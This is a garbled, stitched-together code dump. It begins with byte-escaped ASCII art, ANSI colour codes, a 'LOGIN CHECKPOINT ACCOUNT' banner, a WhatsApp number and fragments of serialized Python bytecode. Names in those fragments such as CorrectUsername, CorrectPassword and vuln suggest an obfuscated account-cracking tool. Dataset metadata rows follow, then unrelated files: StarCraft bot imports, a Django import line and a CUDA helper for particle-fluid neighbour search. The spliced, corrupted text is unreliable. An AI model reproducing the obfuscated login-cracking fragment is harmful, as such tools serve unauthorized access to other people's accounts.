\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6..$$\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\n\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6..$$s\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6s$$\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6..\n\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6.$$$$\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6.$$$$\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6.\n\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xc2\xb3$$$$..\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6..$$$$\xc2\xb3\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\n\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6..\xc2\xb3$$$$..\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6..$$$$\xc2\xb3\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6..\n\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xc2\xb6..$$$$$..\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6..$$$$$..\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\n\xe2\x80\xa6\
xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6.\xc2\xb6\xc2\xb6\xc2\xb6..$$$..\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6..$$$..\xc2\xb6\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\n\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6.\xc2\xb6\xc2\xb6\xc2\xb6\xe2\x80\xa6.\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xe2\x80\xa6.\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\n\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6.\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\n\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6..\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6..\n\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6..\xc2\xb6\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6..\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6.\xc2\xb6\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\n\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6..\xc2\xb6\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6..\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6.\xc2\xb6\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6.\n\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6..\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6..\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6.\n\xe2
\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6.\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6.\n\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6.\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\n\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6.\xc2\xb6..\xc2\xb6..\xc2\xb6..\xc2\xb6..\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\n\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6..\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6..\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6..\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6..\n\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6.\xc2\xb6\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6.\xc2\xb6\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\n\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6.\xc2\xb6\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6.\xc2\xb6\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\n\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6.\xc2\xb6\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6..\xc2\xb6\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6.\xc2\xb6\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6..\xc2\xb6\xc2\xb6\x
e2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\n\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6.\xc2\xb6\xc2\xb6..\xc2\xb6\xc2\xb6..\xc2\xb6\xc2\xb6..\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6..\xc2\xb6..\xc2\xb6\xc2\xb6..\xc2\xb6\xc2\xb6..\xc2\xb6\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\n\xe2\x80\xa6\xe2\x80\xa6\xc2\xb6..\xc2\xb6\xc2\xb6..\xc2\xb6\xc2\xb6..\xc2\xb6\xc2\xb6..\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6..\xc2\xb6..\xc2\xb6\xc2\xb6..\xc2\xb6\xc2\xb6..\xc2\xb6\xc2\xb6..\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6..\n\xe2\x80\xa6.\xc2\xb6\xc2\xb6..\xc2\xb6\xc2\xb6..\xc2\xb6\xc2\xb6..\xc2\xb6\xc2\xb6..\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6..\xc2\xb6..\xc2\xb6\xc2\xb6..\xc2\xb6\xc2\xb6..\xc2\xb6\xc2\xb6..\xc2\xb6\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6\n\xe2\x80\xa6\xe2\x80\xa6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6..\xc2\xb6\xc2\xb6..\xc2\xb6\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6.\xc2\xb6\xc2\xb6..\xc2\xb6\xc2\xb6..\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6..\n \n LOGIN CHECKPOINT ACCOUNT AFTER 8 DAYS\n\n\xe2\x80\xa2\x1b[1;95m\xe2\x97\x88\xe2\x80\xa2\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2.\n: \x1b[1;91m ...\xf0\x9d\x94\xb8\xf0\x9d\x95\x9d\xf0\x9d\x95\x92\xf0\x9d\x95\x9e\xf0\x9d\x95\x9a\xf0\x9d\x95\x9f \xf0\x9d\x95\x80\xf0\x9d\x95\xa4\xf0\x9d\x95\x9d\xf0\x9d\x95\x92\xf0\x9d\x95\x9e....... 
\x1b[1;95m :\n\xe2\x80\xa2\x1b[1;95m\xe2\x97\x88\xe2\x80\xa2\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2.\' \n WhatsApp Number\n \x1b[1;91m +923232132362(\x1c\x00\x00\x00RH\x00\x00\x00Rm\x00\x00\x00R\x05\x00\x00\x00RB\x00\x00\x00RG\x00\x00\x00R!\x00\x00\x00RW\x00\x00\x00RX\x00\x00\x00R`\x00\x00\x00RY\x00\x00\x00RZ\x00\x00\x00R[\x00\x00\x00Ra\x00\x00\x00R\x80\x00\x00\x00RE\x00\x00\x00Rl\x00\x00\x00RD\x00\x00\x00R\x18\x00\x00\x00R\x0f\x00\x00\x00R\x06\x00\x00\x00R\x19\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R\x1e\x00\x00\x00R\x00\x00\x00\x00t\x03\x00\x00\x00mapR\x7f\x00\x00\x00R\x81\x00\x00\x00(\x0c\x00\x00\x00t\x04\x00\x00\x00peakR)\x00\x00\x00R\x1f\x00\x00\x00t\x01\x00\x00\x00st\x03\x00\x00\x00idtt\x03\x00\x00\x00jokt\x02\x00\x00\x00opR\x14\x00\x00\x00R"\x00\x00\x00R#\x00\x00\x00R\x8f\x00\x00\x00t\x01\x00\x00\x00p(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<febry>Rm\x00\x00\x00\x08\x01\x00\x00sp\x00\x00\x00\x00\x01\x0c\x01\x0c\x01\x05\x01\n\x01\x0c\x01\r\x01\x05\x01\x05\x01\n\x01\x13\x01\x12\x01\x11\x01\x18\x01\x0c\x01\r\x01\x05\x01\x0c\x01\x05\x01\x03\x01\x1b\x01\x12\x01\x11\x01\r\x01\x05\x01\n\x01\x0b\x01\x05\x01\x1b\x01\x12\x01\x11\x01\x18\x01\x0c\x01\n\x02\x05\x01\x07\x02\x15\x01\n\x01\x0f\x01\r\x01\x08\x00\r\x00\x11\x01\x05\x01\x05\x01\n\x01\x05\x03\t\xd5\x0c\x01\x10\x01\x05\x01\x05\x01\x05\x01)#\x05\x02\n\x01t\x08\x00\x00\x00__main__(7\x00\x00\x00R\x05\x00\x00\x00R\x06\x00\x00\x00R\x1d\x00\x00\x00t\x08\x00\x00\x00datetimeR\r\x00\x00\x00RS\x00\x00\x00t\x02\x00\x00\x00ret\t\x00\x00\x00threadingRY\x00\x00\x00R|\x00\x00\x00t\t\x00\x00\x00cookielibRW\x00\x00\x00RJ\x00\x00\x00t\x14\x00\x00\x00multiprocessing.poolR\x00\x00\x00\x00t\x13\x00\x00\x00requests.exceptionsR\x
01\x00\x00\x00R\x02\x00\x00\x00t\x06\x00\x00\x00reloadt\x12\x00\x00\x00setdefaultencodingRI\x00\x00\x00t\x11\x00\x00\x00set_handle_robotst\x05\x00\x00\x00Falset\x12\x00\x00\x00set_handle_refresht\x05\x00\x00\x00_httpt\x14\x00\x00\x00HTTPRefreshProcessort\n\x00\x00\x00addheadersR\x08\x00\x00\x00R\x15\x00\x00\x00R\x10\x00\x00\x00R!\x00\x00\x00RG\x00\x00\x00R$\x00\x00\x00t\x04\x00\x00\x00backt\x08\x00\x00\x00berhasilR\x81\x00\x00\x00R\x7f\x00\x00\x00Ra\x00\x00\x00t\x08\x00\x00\x00listgrupt\x06\x00\x00\x00vulnott\x04\x00\x00\x00vulnRB\x00\x00\x00t\x0f\x00\x00\x00CorrectUsernamet\x0f\x00\x00\x00CorrectPasswordt\x04\x00\x00\x00loopRH\x00\x00\x00t\x08\x00\x00\x00usernameR0\x00\x00\x00R\x1e\x00\x00\x00R_\x00\x00\x00RD\x00\x00\x00Ri\x00\x00\x00Rl\x00\x00\x00Rm\x00\x00\x00t\x08\x00\x00\x00__name__(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<febry>t\x08\x00\x00\x00<module>\x08\x00\x00\x00sd\x00\x00\x00\x9c\x01\x10\x01\x10\x01\x10\x03\n\x01\r\x01\x0c\x01\r\x01\x1c\x01\x12\x03\t\x05\t\x08\t\n\t*\x06\x02\t\x06\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x02\r\x08\x05\x01\n\x01\x05\x02\x06\x01\x06\x02\x06\x01\x0f\x01\x0c\x01\x0c\x01\x0c\x01\x0c\x01\t\x01\r\x01\t\x02\x05\x01\x10\x02\x05\x01\x11\x02\t=\t#\t\x10\t\x11\t\xff\x004\x0c\x01')) | 8,011.375 | 63,812 | 0.746283 | 15,007 | 64,091 | 3.183115 | 0.050177 | 0.118194 | 0.077247 | 0.099981 | 0.794825 | 0.74831 | 0.695828 | 0.663129 | 0.643869 | 0.6217 | 0 | 0.371415 | 0.006023 | 64,091 | 8 | 63,812 | 8,011.375 | 0.378432 | 0.003932 | 0 | 0 | 0 | 3.5 | 0.703356 | 0.630416 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.5 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 13 |
849f9c85bda46ea1ab0bb2030ab8909d2d4656bd | 210 | py | Python | sharpy-sc2/sharpy/plans/terran.py | ProfessorQu/Sharpy-Bot | a8bf7ebbed113f5bf0f6891c9ca45fac9edfb26e | [
"MIT"
] | 48 | 2019-11-25T20:02:27.000Z | 2022-02-28T00:16:21.000Z | sharpy-sc2/sharpy/plans/terran.py | ProfessorQu/Sharpy-Bot | a8bf7ebbed113f5bf0f6891c9ca45fac9edfb26e | [
"MIT"
] | 48 | 2020-03-10T17:08:04.000Z | 2022-02-22T08:21:12.000Z | sharpy-sc2/sharpy/plans/terran.py | ProfessorQu/Sharpy-Bot | a8bf7ebbed113f5bf0f6891c9ca45fac9edfb26e | [
"MIT"
] | 25 | 2019-12-01T18:14:54.000Z | 2022-03-24T01:14:53.000Z | from sharpy.plans import *
from sharpy.plans.acts import *
from sharpy.plans.require import *
from sharpy.plans.acts.terran import *
from sharpy.plans.tactics import *
from sharpy.plans.tactics.terran import *
| 30 | 41 | 0.795238 | 31 | 210 | 5.387097 | 0.258065 | 0.359281 | 0.538922 | 0.628743 | 0.634731 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.114286 | 210 | 6 | 42 | 35 | 0.897849 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
ca0233ac8906ef90cb1701ed4f0218f3e174da6f | 58 | py | Python | django_extended/utils/date/__init__.py | dalou/django-extended | a7ba952ea7089cfb319b4615ae098579c9ab14f9 | [
"BSD-3-Clause"
] | 1 | 2015-12-14T17:16:04.000Z | 2015-12-14T17:16:04.000Z | django_extended/utils/date/__init__.py | dalou/django-extended | a7ba952ea7089cfb319b4615ae098579c9ab14f9 | [
"BSD-3-Clause"
] | null | null | null | django_extended/utils/date/__init__.py | dalou/django-extended | a7ba952ea7089cfb319b4615ae098579c9ab14f9 | [
"BSD-3-Clause"
] | null | null | null | from .format_date_range_html import format_date_range_html | 58 | 58 | 0.931034 | 10 | 58 | 4.8 | 0.6 | 0.416667 | 0.625 | 0.791667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.051724 | 58 | 1 | 58 | 58 | 0.872727 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
047ee2af1c145c4dc14eefcdf2257e3652accddf | 39,526 | py | Python | cuHelper.py | zijieli-Jlee/FGN | f707ed31687ea355ab62a1eaf43b5756a6ed883e | [
"MIT"
] | 2 | 2022-02-28T07:36:47.000Z | 2022-03-10T04:45:57.000Z | cuHelper.py | BaratiLab/FGN | 04729eaebfa8395a7d2ebb275761f98dc0342933 | [
"MIT"
] | null | null | null | cuHelper.py | BaratiLab/FGN | 04729eaebfa8395a7d2ebb275761f98dc0342933 | [
"MIT"
] | null | null | null | import numba as nb
import numpy as np
from numba import cuda
from Constants import COL_COEF, DT, BASE_RADIUS
import math
import cupy as cp
import time
THREADS = 256
@cuda.jit(device=True)
def weight(r, re):
if r < 1e-8:
return 0.0
else:
return (re/r) - 1.
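The `weight` device function above is the standard MPS (Moving Particle Semi-implicit) kernel, w(r) = re/r - 1 inside the support radius, with a guard that returns zero as r approaches zero to avoid division by zero. A minimal pure-Python twin (the name `mps_weight` is chosen here for illustration) for host-side sanity checks:

```python
def mps_weight(r, re):
    # Same shape as the CUDA device function `weight` above:
    # zero near r = 0 to avoid division by zero, otherwise the
    # hyperbolic MPS kernel re/r - 1.
    if r < 1e-8:
        return 0.0
    return re / r - 1.0

# At half the support radius the kernel weight is exactly 1;
# at the support radius it reaches 0.
half = mps_weight(0.05, 0.1)
edge = mps_weight(0.1, 0.1)
```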
@cuda.jit('float32(float32[:, :], int32, int32)', device=True)
def distance(pos, i, j):
rx = pos[i, 0] - pos[j, 0]
ry = pos[i, 1] - pos[j, 1]
rz = pos[i, 2] - pos[j, 2]
return math.sqrt(rx**2 + ry**2 + rz**2)
@cuda.jit('boolean(float32[:, :], float32[:], int32)', device=True)
def check_in_range(pos, boundary, i):
rx = pos[i, 0]
ry = pos[i, 1]
rz = pos[i, 2]
max_x, min_x, max_y, min_y, max_z, min_z = \
boundary[0], boundary[1], boundary[2], boundary[3], boundary[4], boundary[5]
return (min_x < rx < max_x and
min_y < ry < max_y and
min_z < rz < max_z)
@cuda.jit(device=True)
def __get_neighbor_min__(val, pos, cell_fst, cell_next, boundary,
i, control_radius, nx, nxy):
cell_len = control_radius * 1.05
min_x, min_y, min_z = boundary[1], boundary[3], boundary[5]
rx, ry, rz = pos[i, 0], pos[i, 1], pos[i, 2]
ix = int((rx - min_x) / cell_len) + 1
iy = int((ry - min_y) / cell_len) + 1
iz = int((rz - min_z) / cell_len) + 1
val_min = val[i]
for jz in range(iz - 1, iz + 2):
for jy in range(iy - 1, iy + 2):
for jx in range(ix - 1, ix + 2):
cell_idx_j = jz * nxy + jy * nx + jx
j = cell_fst[cell_idx_j]
if j == -1:
continue
while True:
dist = distance(pos, i, j)
if dist < control_radius:
if val[j] < val_min:
val_min = val[j]
j = cell_next[j]
if j == -1:
break
return val_min
@cuda.jit
def cu_init_int_array(arr, param, tot_num):
i = cuda.blockIdx.x * cuda.blockDim.x + cuda.threadIdx.x
if i < tot_num:
arr[i] = param
@cuda.jit
def cu_init_float_array(arr, param, tot_num):
i = cuda.blockIdx.x * cuda.blockDim.x + cuda.threadIdx.x
if i < tot_num:
arr[i] = param
@nb.njit
def __check_in_range__(pos, boundary, i):
rx = pos[i, 0]
ry = pos[i, 1]
rz = pos[i, 2]
max_x, min_x, max_y, min_y, max_z, min_z = \
boundary[0], boundary[1], boundary[2], boundary[3], boundary[4], boundary[5]
return (min_x < rx < max_x and
min_y < ry < max_y and
min_z < rz < max_z)
@nb.njit
def cell_sort(pos, boundary, control_radius, nx, nxy, nxyz, tot_num):
cell_fst = -np.ones((nxyz, ), dtype=np.int32)
cell_lst = -np.ones((nxyz, ), dtype=np.int32)
cell_next = -np.ones((tot_num, ), dtype=np.int32)
for i in range(tot_num):
if not __check_in_range__(pos, boundary, i):
continue
cell_len = control_radius * 1.05
min_x, min_y, min_z = boundary[1], boundary[3], boundary[5]
rx, ry, rz = pos[i, 0], pos[i, 1], pos[i, 2]
ix = int((rx - min_x) / cell_len) + 1
iy = int((ry - min_y) / cell_len) + 1
iz = int((rz - min_z) / cell_len) + 1
cell_idx = iz * nxy + iy * nx + ix
j = cell_lst[cell_idx]
cell_lst[cell_idx] = i
if j == -1:
cell_fst[cell_idx] = i
else:
cell_next[j] = i
return cell_fst, cell_next
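`cell_sort` expects grid dimensions `nx`, `nxy`, `nxyz` consistent with the `+ 1` ghost-cell index offsets used for `ix`, `iy`, `iz`. A hedged host-side sketch of how those dimensions could be derived; the `+ 3` padding (one ghost cell per side plus the rounding cell) is an assumption for illustration, not taken from this file:

```python
def grid_dims(boundary, control_radius):
    # boundary layout matches this file: [max_x, min_x, max_y, min_y, max_z, min_z]
    cell_len = control_radius * 1.05
    max_x, min_x, max_y, min_y, max_z, min_z = boundary
    nx = int((max_x - min_x) / cell_len) + 3  # assumed padding of 3 cells
    ny = int((max_y - min_y) / cell_len) + 3
    nz = int((max_z - min_z) / cell_len) + 3
    return nx, nx * ny, nx * ny * nz

nx, nxy, nxyz = grid_dims([1.0, 0.0, 1.0, 0.0, 1.0, 0.0], 0.1)
```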
@nb.njit(parallel=True)
def get_p_in_cell(pos, ids, cell_fst, cell_next, min_x, min_y, min_z, nxy, nx, control_radius):
p_in_cell = -np.ones((pos.shape[0], ), dtype=np.int32)
cell_len = control_radius * 1.05
for i in nb.prange(ids.shape[0]):
idx = ids[i]
p_in_cell[idx] = 1
ix = int((pos[idx, 0] - min_x) / cell_len) + 1
iy = int((pos[idx, 1] - min_y) / cell_len) + 1
iz = int((pos[idx, 2] - min_z) / cell_len) + 1
for jz in range(iz - 1, iz + 2):
for jy in range(iy - 1, iy + 2):
for jx in range(ix - 1, ix + 2):
cell_idx_j = jz * nxy + jy * nx + jx
j = cell_fst[cell_idx_j]
if j == -1:
continue
while True:
rx = pos[j, 0] - pos[idx, 0]
ry = pos[j, 1] - pos[idx, 1]
rz = pos[j, 2] - pos[idx, 2]
dist = math.sqrt(rx**2 + ry**2 + rz**2)
if dist < control_radius:
p_in_cell[j] = 1
j = cell_next[j]
if j == -1:
break
return p_in_cell
@nb.njit
def stack_col_feature(attr_arr, idx_arr, tot_size):
v = np.zeros((tot_size, 6), dtype=np.float32)
i = np.zeros((tot_size, 2), dtype=np.int64)
count = 0
for row in range(idx_arr.shape[0]):
neighbor_num = idx_arr[row, 0]
for j in range(1, neighbor_num + 1):
col = idx_arr[row, j]
i[count] = np.array([row, col])
for n in range(6):
v[count, n] = attr_arr[row, 6*j + n]
count += 1
assert (count == tot_size)
return i, v
@nb.njit
def stack_edge_idx(idx_arr, tot_size):
i = np.zeros((tot_size, 2), dtype=np.int64)
count = 0
for row in range(idx_arr.shape[0]):
neighbor_num = idx_arr[row, 0]
for j in range(1, neighbor_num + 1):
col = idx_arr[row, j]
i[count] = np.array([row, col])
count += 1
assert (count == tot_size)
return i
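`stack_edge_idx` flattens the padded per-row neighbour table (column 0 holds the neighbour count, columns 1..count the neighbour indices) into a COO-style edge list. The same traversal in plain Python on a toy two-row table:

```python
# Toy neighbour table: row 0 has neighbours 5 and 7, row 1 has neighbour 3.
idx_arr = [[2, 5, 7, 0],
           [1, 3, 0, 0]]
edges = []
for row in range(len(idx_arr)):
    neighbor_num = idx_arr[row][0]
    for j in range(1, neighbor_num + 1):
        edges.append((row, idx_arr[row][j]))
# edges == [(0, 5), (0, 7), (1, 3)]
```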
@nb.njit
def stack_gns_feature(attr_arr, idx_arr, tot_size):
v = np.zeros((tot_size, 4), dtype=np.float32)
i = np.zeros((tot_size, 2), dtype=np.int64)
count = 0
for row in range(idx_arr.shape[0]):
neighbor_num = idx_arr[row, 0]
for j in range(1, neighbor_num + 1):
col = idx_arr[row, j]
i[count] = np.array([row, col])
for n in range(4):
v[count, n] = attr_arr[row, 4*j + n]
count += 1
assert (count == tot_size)
return i, v
